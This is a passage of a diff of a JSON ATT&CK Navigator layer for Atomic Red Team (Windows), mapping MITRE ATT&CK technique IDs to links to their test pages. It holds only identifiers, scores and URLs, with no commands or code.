Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View 
